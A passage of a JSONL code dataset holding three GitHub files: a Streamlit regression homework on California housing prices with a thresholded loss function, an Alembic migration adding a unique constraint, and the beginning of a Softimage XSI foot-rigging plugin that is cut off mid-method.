+{"seq_id":"13137095203","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 21 11:43:29 2022\n\n@author: humeyraakyuz\n\"\"\"\n\nimport numpy as np\nimport streamlit as st\nimport plotly.express as px\nimport pandas as pd\nfrom sklearn.datasets import fetch_california_housing\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.metrics import r2_score\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\nimport scipy.signal.signaltools\nfrom sklearn import preprocessing\n\ndef root_mean_squared_error(actual, predictions):\n return np.sqrt(mean_squared_error(actual, predictions))\n\n\ndef _centered(arr, newsize):\n # Return the center newsize portion of the array.\n newsize = np.asarray(newsize)\n currsize = np.array(arr.shape)\n startind = (currsize - newsize) // 2\n endind = startind + newsize\n myslice = [slice(startind[k], endind[k]) for k in range(len(endind))]\n return arr[tuple(myslice)]\n\nscipy.signal.signaltools._centered = _centered\n\n\n\ndef reg(x, y, group, p=0.3, verbose=False):\n beta = np.random.random(2)\n gamma = dict((k, np.random.random(2)) for k in range(6))\n\n if verbose:\n st.write(beta)\n st.write(gamma)\n st.write(x)\n\n alpha = 0.002\n my_bar = st.progress(0.)\n n_max_iter = 100\n for it in range(n_max_iter):\n\n err = 0\n for _k, _x, _y in zip(group, x, y):\n y_pred = p * (beta[0] + beta[1] * _x) + (1 - p) * (gamma[_k][0] + gamma[_k][1] * _x)\n\n g_b0 = -2 * p * (_y - y_pred)\n g_b1 = -2 * p * ((_y - y_pred) * _x)\n\n # st.write(f\"Gradient of beta0: {g_b0}\")\n\n g_g0 = -2 * (1 - p) * (_y - y_pred)\n g_g1 = -2 * (1 - p) * ((_y - y_pred) * _x)\n\n beta[0] = beta[0] - alpha * g_b0\n beta[1] = beta[1] - alpha * g_b1\n\n gamma[_k][0] = gamma[_k][0] - alpha * g_g0\n gamma[_k][1] = gamma[_k][1] - alpha * g_g1\n\n err += (_y - y_pred) ** 2\n\n print(f\"{it} - Beta: {beta}, Gamma: {gamma}, Error: {err}\")\n my_bar.progress(it / n_max_iter)\n\n return beta, gamma\n\n\n\n\n\ndef modifiedModel(x, y,teta) -> np.ndarray:\n \n lam=0.01\n alpha=0.001\n iteration=200\n \n \n objective_values=[]\n beta = np.random.random(2)\n \n for i in range(iteration):\n \n y_pred: np.ndarray = beta[0] + beta[1] * x\n \n g_b0 = 0\n g_b1 = 0\n objective = 0\n # use j for the inner index so the outer iteration counter i is not shadowed\n for j, v in enumerate(x):\n objective += (max(teta,np.abs(y[j] - y_pred[j])))**2 \n if np.abs(y[j] - y_pred[j]) >= teta:\n err = y[j] - y_pred[j]\n g_b0 = g_b0 -2 * err\n g_b1 = g_b1 -2 * err * v\n \n g_b0 = (g_b0 / len(x)) + 2 * 
lam * beta[0]\n g_b1 = (g_b1 / len(x)) + 2 * lam * beta[1]\n \n objective = (objective / len(x) + ((beta[0]+ beta[1])**2))\n \n print(f\"({i}) beta: {beta}, gradient: {g_b0} {g_b1} obj: {objective}\")\n beta_prev = np.copy(beta)\n objective_values.append(objective)\n\n \n beta[0] = beta[0] - alpha * g_b0 \n beta[1] = beta[1] - alpha * g_b1 \n\n if np.linalg.norm(beta - beta_prev) < 0.000001:\n print(f\"I do early stoping at iteration {i}\")\n break\n \n # plot objective function during iterations\n plt.figure(figsize = (10, 6))\n plt.plot(range(1, iteration + 1), objective_values, \"k-\")\n plt.xlabel(\"Iteration\")\n plt.ylabel(\"Error\")\n plt.show()\n \n return beta\n\n\n\n\ndef normalize(df):\n for cl in df:\n df[cl]= (df[cl]- df[cl].mean())/df[cl].std()\n return df\n\n\ndef performance(beta,X,y):\n y_pred=[]\n for v in X:\n y_pred.append( beta[0] + beta[1] * v)\n\n dg1 = pd.DataFrame(dict(x=X, y=y, y_pred=y_pred))\n\n\n fig1 = plt.figure(figsize = (10, 10))\n plt.plot(X, dg1[\"y\"], \"b.\", markersize = 5)\n plt.plot(X, dg1[\"y_pred\"], \"c.\", markersize = 5)\n st.plotly_chart( fig1, use_container_width=True)\n\n\n st.write(f\"Mean Squared Error: {mean_squared_error(y,y_pred)}\")\n st.write(f\"Root Mean Squared Error: {root_mean_squared_error(y,y_pred)}\")\n st.write(f\"R^2 score: {r2_score(y,y_pred)}\")\n\n\n\n\nst.header(\"Building a Simple Regression Model with Different Loss Function\")\nst.markdown(\"\"\"\n In that problem I assume that for each data point if the prediction error below the specified threshold, that error is acceptable and does not effect the gradient:\n \n For example for a house with price 5, if prediction is between 4 and 6, that prediction is okay,otherwise we should penalize deviation.\n In order to achieve this our objective function(loss function) has changed\n \n p.s: if you think my assumption is wrong, just change the >= to <= in code (line 101)\n \n New loss function is: \n \"\"\")\n\nst.subheader(\"Formulating the Model\")\nst.markdown(\"#### General Model\")\nst.latex(r\"\\hat{y}^{0}_i=\\beta_0 + \\beta_1 x_i\")\n\nst.markdown(\"#### Loss Function\")\n\n\nst.latex(\n r\"L(\\beta_0,\\beta_1)=\\sum_{i=1}^{N}{(max(\\Theta,(y_i - \\hat{y}_i ))^2)/N + \\lambda (\\beta_0^2 + \\beta_1^2)}\")\n\n\nst.markdown(\"#### Partial Derivatives\")\n\nst.markdown(\"\"\"\n We should use chain rule and backpropagation to explain the max function effect.\n \n For example derivative of that function with respect to lambda is:\n \"\"\")\nst.latex(\n r\" y(\\lambda) = max(\\Theta,\\lambda)\")\n \nst.latex(\n r\"\\frac{\\partial y(\\lambda)}{\\partial \\lambda} = \\begin{cases} 1 &\\text{if } \\lambda > \\Theta \\\\ 0 &\\text{otherwise } \\end{cases}\")\n \n\nst.markdown(\"\"\"Therefore if error is smaller than a specified threshold , it will not effect the gradient. 
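A quick numeric check of the banded-loss gradient logic that `modifiedModel` in the hw1.py record implements: residuals inside the theta band contribute nothing to the gradient, while larger residuals contribute the usual squared-error terms. This is a standalone sketch with illustrative names, not the app's code.

import numpy as np

def thresholded_gradient(x, y, beta, theta, lam=0.0):
    # gradient of mean(max(theta, |y - y_hat|)^2) + lam * ||beta||^2 w.r.t. beta
    y_hat = beta[0] + beta[1] * x
    err = y - y_hat
    mask = np.abs(err) >= theta              # only residuals beyond the band matter
    g0 = (-2 * err[mask]).sum() / len(x) + 2 * lam * beta[0]
    g1 = (-2 * err[mask] * x[mask]).sum() / len(x) + 2 * lam * beta[1]
    return g0, g1

x = np.array([0.0, 1.0, 2.0])
y = np.array([0.1, 1.0, 2.5])
g0, g1 = thresholded_gradient(x, y, beta=np.array([0.0, 1.0]), theta=0.2)
# residuals are (0.1, 0.0, 0.5); only the last one exceeds theta = 0.2
assert np.isclose(g0, -2 * 0.5 / 3) and np.isclose(g1, -2 * 0.5 * 2.0 / 3)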
\n    In that case, we can compute the gradient as follows:\n    \"\"\")\n\nst.latex( r\"\\qquad \\qquad \\Delta B_0 = 0 , \\Delta B_1 = 0\")\nst.latex( r\"\\text{for i in X:} \")\nst.latex( r\"\\qquad \\qquad \\qquad \\qquad \\qquad \\text{if } |y_i - \\hat{y}_i| \\geq \\Theta :\")\nst.latex( r\"\\qquad \\qquad \\qquad \\qquad \\qquad \\qquad \\qquad \\qquad \\Delta B_0 += -2 * (y_i - \\hat{y}_i) \")\nst.latex( r\"\\qquad \\qquad \\qquad \\qquad \\qquad \\qquad \\qquad \\qquad \\Delta B_1 += -2 * (y_i - \\hat{y}_i) * x_i \")\nst.latex( r\"\\qquad \\qquad \\qquad \\Delta B_1 = \\frac {\\Delta B_1}{N} + 2 * \\lambda * \\beta_1 \")\nst.latex( r\"\\qquad \\qquad \\qquad \\Delta B_0 = \\frac {\\Delta B_0}{N} + 2 * \\lambda * \\beta_0 \")\n\n\n\nst.header(\"Dataset\")\n\n# fetch the data\ncal_housing = fetch_california_housing()\ndf = pd.DataFrame(cal_housing.data, columns=cal_housing.feature_names)\nHouseAgeGroup = (df['HouseAge'].values / 10).astype(int)  # np.int is deprecated; use the builtin\n\n# keep only the relevant features\ndf = pd.DataFrame(dict(MedInc=df['MedInc'], price=cal_housing.target))\n\n# normalize the data if required\n# (for this dataset, normalization does not work well)\n#df=normalize(df) \n\n\nx, y = np.array(df[\"MedInc\"]), np.array(df[\"price\"])\nst.dataframe(df)\n\nst.subheader(\"Correlation\")\n## correlation between income and house price is 0.68\nr = np.corrcoef(x, y)\n\nst.write(f\"Correlation between Income and House Price is: {r[0][1]:.2f}\")\n\n\n# split the data set into train and test\nX_train, X_test, y_train, y_test = train_test_split(x, y, test_size=0.33, random_state=42)\n\n\np = st.slider(\"Mixture Ratio (p)\", 0.0, 1.0, value=0.8)\nbeta, gamma = reg(X_train, y_train, HouseAgeGroup,\n                  p=p,\n                  verbose=False)\n\nst.subheader(f\"General Model with p={p:.2f} contribution\")\nst.latex(fr\"Price = {beta[1]:.4f} \\times MedInc + {beta[0]:.4f}\")\n\n\nst.header(\"Performance Metrics for General Model\")\n\nst.header(\"Train Performance\")\nperformance(beta, X_train, y_train)\n\nst.header(\"Test Performance\")\nperformance(beta, X_test, y_test)\n\nst.header(\"Performance Metrics for Modified Model\")\n\nteta = st.slider(\"Theta Value\", 0.0, 1.0, value=0.4)\n\nst.header(\"Train Performance\")\n# fit the modified model (thresholded loss with L2 regularization)\nw = modifiedModel(X_train, y_train, teta)\nperformance(w, X_train, y_train)\n\nst.header(\"Test Performance\")\nperformance(w, X_test, y_test)\n\n","repo_name":"hakyuz16/TrendyolBootCamp","sub_path":"hw1.py","file_name":"hw1.py","file_ext":"py","file_size_in_byte":7982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74933280809","text":"\"\"\"role is changed\n\nRevision ID: 001b9c19353c\nRevises: bf6775dba4fc\nCreate Date: 2022-08-30 17:24:38.668534\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '001b9c19353c'\ndown_revision = 'bf6775dba4fc'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.create_unique_constraint(None, 'user_roles', ['name'])\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_constraint(None, 'user_roles', type_='unique')\n # ### end Alembic commands ###\n","repo_name":"bakhtiyorovdilshod/shtatka","sub_path":"migrations/versions/001b9c19353c_role_is_changed.py","file_name":"001b9c19353c_role_is_changed.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"12141023114","text":"\"\"\"\r\nzFoot.py\r\n\r\nCreated by andy on 2008-07-22.\r\nCopyright (c) 2008 Zoogloo LLC. All rights reserved.\r\n\"\"\"\r\n\r\n__version__ = '$Revision: 214 $'\r\n__author__ = '$Author: andy $'\r\n__date__ = '$Date: 2009-12-30 00:36 -0800 $'\r\n\r\nimport win32com.client\r\nimport win32com.server\r\nfrom win32com.client import constants\r\nfrom win32com.client import constants as c\r\nfrom win32com.client.dynamic import Dispatch as dispatch\r\nimport re\r\n\r\nxsi = Application\r\nlog = xsi.logmessage\r\n\r\nnull = None\r\nfalse = 0\r\ntrue = 1\r\n\r\ndef XSILoadPlugin(in_reg):\r\n\tin_reg.Author = \"Andy Buecker\"\r\n\tin_reg.Name = \"zFoot\"\r\n\tin_reg.Email = \"andy@zoogloo.net\"\r\n\tin_reg.URL = \"\"\r\n\tin_reg.Major = 1\r\n\tin_reg.Minor = 1\r\n\r\n\t# in_reg.RegisterProperty('zFoot')\r\n\r\n\tin_reg.RegisterCommand('zFoot', 'zFoot')\r\n\r\n\t# in_reg.RegisterMenu(c.siMenuTbAnimateActionsStoreID, 'zFootMenu', False)\r\n\t\r\n\t# copyright message #\r\n\tmsg = '''\r\n#------------------------------------------#\r\n %s (v.%d.%d)\r\n Copyright 2008 Zoogloo LLC.\r\n All rights Reserved.\r\n#------------------------------------------#\r\n\t''' % (in_reg.Name, in_reg.Major, in_reg.Minor)\r\n\tlog(msg)\r\n\r\n\treturn true\r\n\r\ndef XSIUnloadPlugin(in_reg):\r\n\tstrPluginName = in_reg.Name\r\n\tApplication.LogMessage(str(strPluginName) + str(\" has been unloaded.\"))\r\n\treturn true\r\n\r\n\r\n#-----------------------------------------------------------------------------\r\n# Commands\r\n#-----------------------------------------------------------------------------\r\ndef zFoot_Init(ctxt):\r\n\toCmd = ctxt.Source\r\n\toCmd.Description = \"\"\r\n\t#oCmd.SetFlag(constants.siNoLogging,false)\r\n\r\n\toArgs = oCmd.Arguments\r\n\toArgs.Add('symmetry', c.siArgumentInput, 'left', c.siString)\r\n\t#oArgs.AddObjectArgument('model')\r\n\r\n\treturn True\r\n\r\ndef zFoot_Execute(symmetry):\r\n\t# export the python object #\r\n\timport win32com.server\r\n\treturn win32com.server.util.wrap(\r\n\t\tzFoot(symmetry)\r\n\t)\r\n\t\r\n\t\r\n#-----------------------------------------------------------------------------\r\n# Classes\r\n#-----------------------------------------------------------------------------\r\n\t\r\ndef zProp(function):\r\n\t'''\r\n\tEasy function decorator for accessing properties.\r\n\t\r\n\tUsage:\r\n\t\r\n\t>>> @zProp\r\n\t>>> def Connection():\r\n\t>>> \t\\'''connection\\'''\r\n\t>>> \tdef fget(self):\r\n\t>>> \t\treturn self._cnx\r\n\t>>>\t\tdef fset(self, value):\r\n\t>>>\t\t\tself._cnx = value\r\n\t>>>\t\tdef fdel(self):\r\n\t>>>\t\t\traise Exception, \"Can't delete attribute 'Connection'\"\r\n\t>>> \treturn locals()\r\n\t\r\n\t'''\r\n\treturn property(doc=function.__doc__, **function())\r\n\r\nclass zFoot(object):\r\n\r\n\t# required for COM wrapper #\r\n\t_public_methods_ = [\r\n\t]\r\n\t# define the output vars here #\r\n\t_public_attrs_ = [\r\n\t\t'rig',\r\n\t\t'template',\r\n\t\t'scale',\r\n\t\t'symmetry',\r\n\t]\r\n\t# define those attrs that are read only #\r\n\t_readonly_attrs_ = [\r\n\t\t'rig',\r\n\t\t'template',\r\n\t]\r\n\r\n\t# set the class 
variables #\r\n\tuid\t\t\t\t= '5c4088413d078fb6a7f703b35a9a5dc7'\r\n\t\r\n\tdef __init__(self, symmetry='left'):\r\n\t\tsuper(zFoot, self).__init__()\r\n\t\t\r\n\t\t# reset the instance variables #\r\n\t\tself._template \t\t= None\r\n\t\tself._rig\t\t\t= None\r\n\t\t\r\n\t\tself.basename\t\t= 'Foot'\r\n\t\tself.scale\t\t\t= 1\r\n\t\tself.symmetry\t\t= symmetry\r\n\t\r\n\t@zProp\r\n\tdef template():\r\n\t\t'''Template Accessor'''\r\n\t\tdef fget(self):\r\n\t\t\t# create a template if it doesn't exist #\r\n\t\t\tif not self._template:\r\n\t\t\t\t# wrap a new class #\r\n\t\t\t\tself._template = dispatch(win32com.server.util.wrap(zFoot_Template(self)))\r\n\t\t\treturn self._template\r\n\t\tdef fset(self, value):\r\n\t\t\traise Exception('Unable to modify template value')\r\n\t\tfdel = fset\r\n\t\treturn locals()\r\n\t\t\r\n\t@zProp\r\n\tdef rig():\r\n\t\t'''Rig accessor'''\r\n\t\tdef fget(self):\r\n\t\t\t# create a rig class if it doesn't exist #\r\n\t\t\tif not self._rig:\r\n\t\t\t\t# wrap a new class #\r\n\t\t\t\tself._rig = dispatch(win32com.server.util.wrap(zFoot_Rig(self)))\r\n\t\t\t# return the private var #\r\n\t\t\treturn self._rig\r\n\t\tdef fset(self, value):\r\n\t\t\traise Exception('Unable to modify rig value.')\r\n\t\tfdel = fset\r\n\t\treturn locals()\r\n\t\t\t\r\n\t\t\t\t\r\nclass zFoot_Template(object):\r\n\t\"\"\"Guide template that places and reads the foot layout nulls.\"\"\"\r\n\t# required for COM wrapper #\r\n\t_public_methods_ = [\r\n\t\t'Draw',\r\n\t\t'LoadDefaultValues',\r\n\t\t'GetFromScene',\r\n\t]\r\n\t# define the output vars here #\r\n\t_public_attrs_ = [\r\n\t\t'parent',\r\n\t\t'model',\r\n\t\t\r\n\t\t'v_ankle',\r\n\t\t'v_heel',\r\n\t\t'v_ball',\r\n\t\t'v_toe',\r\n\t] \r\n\t# define those attrs that are read only #\r\n\t_readonly_attrs_ = [\r\n\t\t'parent'\r\n\t]\r\n\r\n\tdef __init__(self, parent):\r\n\t\tsuper(zFoot_Template, self).__init__()\r\n\t\t\r\n\t\t# set the instance variables #\r\n\t\tself.parent\t\t= parent\r\n\t\tself.model \t\t= None\r\n\t\t\r\n\t\t# load the default values #\r\n\t\tself.LoadDefaultValues()\r\n\t\r\n\tdef LoadDefaultValues(self):\r\n\t\t\"\"\"Sets the default values for the template\"\"\"\r\n\t\tself.v_ankle\t= XSIMath.CreateVector3(2.580, 3.454, 0.216)\r\n\t\tself.v_ball \t= XSIMath.CreateVector3(3.290, 0.986, 2.343)\r\n\t\tself.v_toe \t= XSIMath.CreateVector3(4.063, 0.495, 4.761)\r\n\t\tself.v_heel\t\t= XSIMath.CreateVector3(2.052, 0.454, -1.739)\r\n\t\tif re.match(r'^right$', self.parent.symmetry, re.I): # right #\r\n\t\t\tself.v_ankle.X\t*= -1\r\n\t\t\tself.v_ball.X \t*= -1\r\n\t\t\tself.v_toe.X \t*= -1\r\n\t\t\tself.v_heel.X\t*= -1\r\n\r\n\t\t# set the default model #\r\n\t\tself.model = xsi.ActiveSceneRoot\r\n\t\t\t\r\n\tdef Draw(self):\r\n\t\t\"\"\"Draws the template container and its manipulator nulls in the scene.\"\"\"\r\n\t\t\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# get the model #\r\n\t\tif not self.model:\r\n\t\t\traise Exception('Model attribute for template not specified.')\r\n\t\t\r\n\t\t# dispatch the model #\r\n\t\tself.model = dispatch(self.model)\r\n\t\t\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# create a node to hold the template #\r\n\t\tnode_parent = self.model.AddNull('Foot_%s_Container' % self.parent.symmetry[0].upper())\r\n\t\tnode_parent.primary_icon.Value = 0\r\n\t\tnode_parent.Properties('Visibility').Parameters('viewvis').Value = False\r\n\t\tnode_parent.Properties('Visibility').Parameters('rendvis').Value = False\r\n\t\tnode_parent.AddProperty('CustomProperty', False, 
'zBuilderTemplateItem')\r\n\t\tprop = node_parent.AddProperty('CustomProperty', False, 'zContainer')\r\n\t\tprop = dispatch(prop)\r\n\t\tprop.AddParameter3('ContainerName', c.siString, 'Foot')\r\n\t\tprop.AddParameter3('ContainerSym', c.siString, self.parent.symmetry)\r\n\t\tprop.AddParameter3('ContainerUID', c.siString, self.parent.uid)\r\n\t\t\r\n\t\t# draw the nodes #\r\n\t\tnode_ankle \t= node_parent.AddNull(xsi.zMapName('FootAnkle', 'Custom:Tmp', self.parent.symmetry))\r\n\t\tnode_ball \t= node_parent.AddNull(xsi.zMapName('FootBall', 'Custom:Tmp', self.parent.symmetry))\r\n\t\tnode_toe \t= node_parent.AddNull(xsi.zMapName('FootToe', 'Custom:Tmp', self.parent.symmetry))\r\n\t\tnode_heel \t= node_parent.AddNull(xsi.zMapName('FootHeel', 'Custom:Tmp', self.parent.symmetry))\r\n\t\t\r\n\t\t# tag the nodes #\r\n\t\tnode_ankle.AddProperty('CustomProperty', False, 'zBuilderTemplateManip')\r\n\t\tnode_ankle.AddProperty('CustomProperty', False, 'zFootAnkle')\r\n\t\t\r\n\t\tnode_ball.AddProperty('CustomProperty', False, 'zBuilderTemplateManip')\r\n\t\tnode_ball.AddProperty('CustomProperty', False, 'zFootBall')\r\n\t\t\r\n\t\tnode_toe.AddProperty('CustomProperty', False, 'zBuilderTemplateManip')\r\n\t\tnode_toe.AddProperty('CustomProperty', False, 'zFootToe')\r\n\t\t\r\n\t\tnode_heel.AddProperty('CustomProperty', False, 'zBuilderTemplateManip')\r\n\t\tnode_heel.AddProperty('CustomProperty', False, 'zFootHeel')\r\n\t\t\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# set the positions #\r\n\t\ttrans = XSIMath.CreateTransform()\r\n\t\tv_result = XSIMath.CreateVector3()\r\n\t\t\r\n\t\t# ankle #\r\n\t\tv_result.Scale(self.parent.scale, self.v_ankle)\r\n\t\ttrans.Translation = v_result\r\n\t\tnode_ankle.Kinematics.Global.Transform = trans\r\n\t\t\r\n\t\t# ball #\r\n\t\tv_result.Scale(self.parent.scale, self.v_ball)\r\n\t\ttrans.Translation = v_result\r\n\t\tnode_ball.Kinematics.Global.Transform = trans\r\n\t\t\r\n\t\t# toe #\r\n\t\tv_result.Scale(self.parent.scale, self.v_toe)\r\n\t\ttrans.Translation = v_result\r\n\t\tnode_toe.Kinematics.Global.Transform = trans\r\n\t\t\r\n\t\t# heel #\r\n\t\tv_result.Scale(self.parent.scale, self.v_heel)\r\n\t\ttrans.Translation = v_result\r\n\t\tnode_heel.Kinematics.Global.Transform = trans\r\n\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# add a visual upvector #\r\n\t\tnode_upv\t\t\t\t\t\t= node_parent.AddNull(xsi.zMapName('%sUpv' % self.parent.basename, 'Custom:Tmp', self.parent.symmetry))\r\n\t\tnode_upv.primary_icon.Value \t= 0\r\n\t\tnode_upv.shadow_icon.Value \t= 10\r\n\t\tnode_upv.size.Value\t\t\t\t= 1\r\n\t\tnode_upv.shadow_offsetZ.Value\t= node_upv.size.Value\r\n\t\t\r\n\t\tnode_upv.shadow_colour_custom\t= True\r\n\t\tnode_upv.R.Value\t\t\t\t= 1\r\n\t\tnode_upv.G.Value\t\t\t\t= 0.8\r\n\t\tnode_upv.B.Value\t\t\t\t= 1\r\n\t\t\r\n\t\tcns_upv\t\t\t\t\t\t\t= node_upv.Kinematics.AddConstraint('Direction', node_toe, False)\r\n\t\tcns_upv\t\t\t\t\t\t\t= dispatch(cns_upv)\r\n\t\tcns_upv.upvct_active.Value \t\t= True\r\n\t\tcns_upv.UpVectorReference\t\t= node_ankle\r\n\t\tcns_upv.dirx\t\t\t\t\t= 0\r\n\t\tcns_upv.diry\t\t\t\t\t= 0\r\n\t\tcns_upv.dirz\t\t\t\t\t= 1\r\n\t\tcns_upv.upx\t\t\t\t\t\t= 1\r\n\t\tcns_upv.upy\t\t\t\t\t\t= 0\r\n\t\tcns_upv.upz\t\t\t\t\t\t= 0\r\n\t\t\r\n\t\tcns_pos\t\t\t\t\t\t\t= node_upv.Kinematics.AddConstraint('Position', node_heel, False)\r\n\t\t\r\n\t\tnode_upv.Size.AddExpression(\r\n\t\t\t'ctr_dist( %s.kine.global, %s.kine.global ) / 2' % 
(\r\n\t\t\t\tnode_heel.FullName, node_toe.FullName\r\n\t\t\t)\r\n\t\t)\r\n\t\t\r\n\tdef GetFromScene(self):\r\n\t\t\"\"\"Gets the template values from the template model\"\"\"\r\n\t\t\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# make sure the model exists \r\n\t\tif not self.model:\r\n\t\t\traise Exception('Model attribute for template not specified.')\r\n\t\t\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# find the container #\r\n\t\tnode_parent = None\r\n\t\tfor node in dispatch(self.model).FindChildren('*'):\r\n\t\t\tif node.Properties('zContainer'):\r\n\t\t\t\tif node.Properties('zContainer').Parameters('ContainerUID').Value == self.parent.uid \\\r\n\t\t\t\tand node.Properties('zContainer').Parameters('ContainerSym').Value == self.parent.symmetry:\r\n\t\t\t\t\tnode_parent = node\r\n\t\t\t\t\tbreak\r\n\t\t# make sure we have the container #\r\n\t\tif not node_parent:\r\n\t\t\traise Exception('Unable to find leg template container by id: %s' % self.parent.uid)\r\n\t\t\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# get all the nodes under the container #\r\n\t\tchild_nodes = node_parent.FindChildren('*')\r\n\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# get the vectors #\r\n\t\tset_zFootAnkle\t= False\r\n\t\tset_zFootBall\t= False\r\n\t\tset_zFootToe\t= False\r\n\t\tset_zFootHeel\t= False\r\n\t\tfor node in child_nodes:\r\n\t\t\tif node.Properties('zFootAnkle'):\r\n\t\t\t\tself.v_ankle \t= node.Kinematics.Global.Transform.Translation\r\n\t\t\t\tset_zFootAnkle\t= True\r\n\t\t\telif node.Properties('zFootBall'):\r\n\t\t\t\tself.v_ball \t= node.Kinematics.Global.Transform.Translation\r\n\t\t\t\tset_zFootBall\t= True\r\n\t\t\telif node.Properties('zFootToe'):\r\n\t\t\t\tself.v_toe \t\t= node.Kinematics.Global.Transform.Translation\r\n\t\t\t\tset_zFootToe\t= True\r\n\t\t\telif node.Properties('zFootHeel'):\r\n\t\t\t\tself.v_heel\t\t= node.Kinematics.Global.Transform.Translation\r\n\t\t\t\tset_zFootHeel\t= True\r\n\r\n\t\t# see if all the variables are set #\t\t\r\n\t\tfor varname in locals().keys():\r\n\t\t\tif re.match(r'^set_.+', varname):\r\n\t\t\t\tif not locals().get(varname):\r\n\t\t\t\t\traise Exception(\r\n\t\t\t\t\t\t'Unable to set \"%s\" template value from scene.' 
% varname\r\n\t\t\t\t\t)\r\n\t\t\r\nclass zFoot_Rig(object):\r\n\t\"\"\"\r\n\tClass for drawing a Foot.\r\n\t\"\"\"\r\n\t# required for COM wrapper #\r\n\t_public_methods_ = [\r\n\t\t'Build',\r\n\t]\r\n\t# define the output vars here #\r\n\t_public_attrs_ = [\r\n\t\t# ins #\r\n\t\t'parent',\t \r\n\t\t'skeleton_parent',\r\n\t\t'controls_parent',\r\n\t\t'deformer_parent',\r\n\t\t'node_pelvis',\t \r\n\t\t'character_set',\t \r\n\t 'con_foot',\t \r\n\t 'con_ankle',\t \r\n\t 'ik_switch',\t \r\n\t 'prop_anim',\t \r\n\t 'prop_anim_di', \r\n\t 'root_leg_con', \r\n\t 'root_skel_leg', \r\n\t\t'size_ball_con',\t\t\r\n\t\t'size_toe_con',\t\t\r\n\t\t'size_toe_pivot_con',\t\r\n\t\t'size_ball_pivot_con',\r\n\t\t'size_fk_cons',\t\r\n\t\t'group_deformers',\t\r\n\t\t'group_controls',\t\r\n\t\t'realign_foot_con',\r\n\t\t'add_middlers',\r\n\r\n\t\t# outs #\r\n\t\t'deformers',\r\n\t\t'character_subset',\r\n\t\t'root_foot',\r\n\t\t'root_foot_rev',\r\n\t\t'con_foot_fk',\r\n\t\t'con_toe',\r\n\t\t'con_toe_fk',\r\n\t\t'con_toe_pivot',\r\n\t\t'con_ball_pivot',\r\n\t\t'con_ball',\r\n\t\t'env_toe',\r\n\t\t'env_foot',\r\n\t]\r\n\t# define those attrs that are read only #\r\n\t_readonly_attrs_ = [\r\n\t\t'parent',\r\n\t\t# outs #\r\n\t\t'deformers',\r\n\t\t'character_subset',\r\n\t\t'root_foot',\r\n\t\t'root_foot_rev',\r\n\t\t'con_foot_fk',\r\n\t\t'con_toe',\r\n\t\t'con_toe_fk',\r\n\t\t'con_toe_pivot',\r\n\t\t'con_ball_pivot',\r\n\t\t'con_ball',\r\n\t\t'env_toe',\r\n\t\t'env_foot',\r\n\t]\r\n\r\n\tdef __init__(self, parent):\r\n\t\tsuper(zFoot_Rig, self).__init__()\r\n\r\n\t\t# set the instance variables #\r\n\t\tself.parent\t\t\t\t\t= parent\r\n\t\tself.skeleton_parent \t\t= None\r\n\t\tself.controls_parent \t\t= None\r\n\t\tself.deformer_parent \t\t= None\r\n\t\tself.character_set\t\t\t= None\r\n\t\tself.con_foot \t= None\r\n\t\tself.con_ankle\t \t\t\t= None\r\n\t\tself.ik_switch \t= None\r\n\t\tself.prop_anim \t= None\r\n\t\tself.prop_anim_di \t= None\r\n\t\tself.root_leg_con \t= None\r\n\t\tself.root_skel_leg \t= None\r\n\t\tself.group_deformers\t\t= None\r\n\t\tself.group_controls\t\t\t= None\r\n\t\tself.realign_foot_con\t\t= True\r\n\t\tself.add_middlers\t\t\t= False\r\n\t\t\r\n\t\tself.size_ball_con\t\t\t= 1\r\n\t\tself.size_toe_con\t\t\t= 1\r\n\t\tself.size_toe_pivot_con\t\t= 1\r\n\t\tself.size_ball_pivot_con\t= 1\r\n\t\tself.size_fk_cons\t\t\t= 1.75\r\n\t\t\r\n\t\t# outputs #\r\n\t\tself.character_subset\t\t= None\r\n\t\tself.root_foot_rev\t\t\t= None\r\n\t\tself.root_foot\t\t\t\t= None\r\n\t\tself.deformers\t\t\t\t= dispatch('XSI.Collection')\r\n\t\t\r\n\t# override the attribute setter to dispatch objects when setting #\r\n\tdef __setattr__(self, name, value):\r\n\t\t# if the name is in the inputs...#\r\n\t\tif name in self._public_attrs_:\r\n\t\t\t# ... 
dispatch the value (if we can)#\r\n\t\t\ttry:\r\n\t\t\t\tself.__dict__[name] = dispatch(value)\r\n\t\t\texcept:\r\n\t\t\t\tself.__dict__[name] = value\r\n\t\telse:\r\n\t\t\traise Exception('Unable to locate public attribute \"%s\"' % (name))\r\n\t\t\t\r\n\tdef Build(self):\r\n\t\t\"\"\"Builds the rig from the template values\"\"\"\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# pre conditions\r\n\t\t\r\n\t\t# make sure we have the skeleton_parent #\r\n\t\tif not self.skeleton_parent:\r\n\t\t\traise Exception(\r\n\t\t\t\t'zFoot.rig.skeleton_parent is not defined.'\r\n\t\t\t)\r\n\t\tself.skeleton_parent = dispatch(self.skeleton_parent)\r\n\t\t\r\n\t\t# make sure we have the controls_parent #\r\n\t\tif not self.controls_parent:\r\n\t\t\traise Exception(\r\n\t\t\t\t'zFoot.rig.controls_parent is not defined.'\r\n\t\t\t)\r\n\t\tself.controls_parent = dispatch(self.controls_parent)\r\n\t\t\r\n\t\t# make sure we have the deformer_parent #\r\n\t\tif not self.deformer_parent:\r\n\t\t\traise Exception(\r\n\t\t\t\t'zFoot.rig.deformer_parent is not 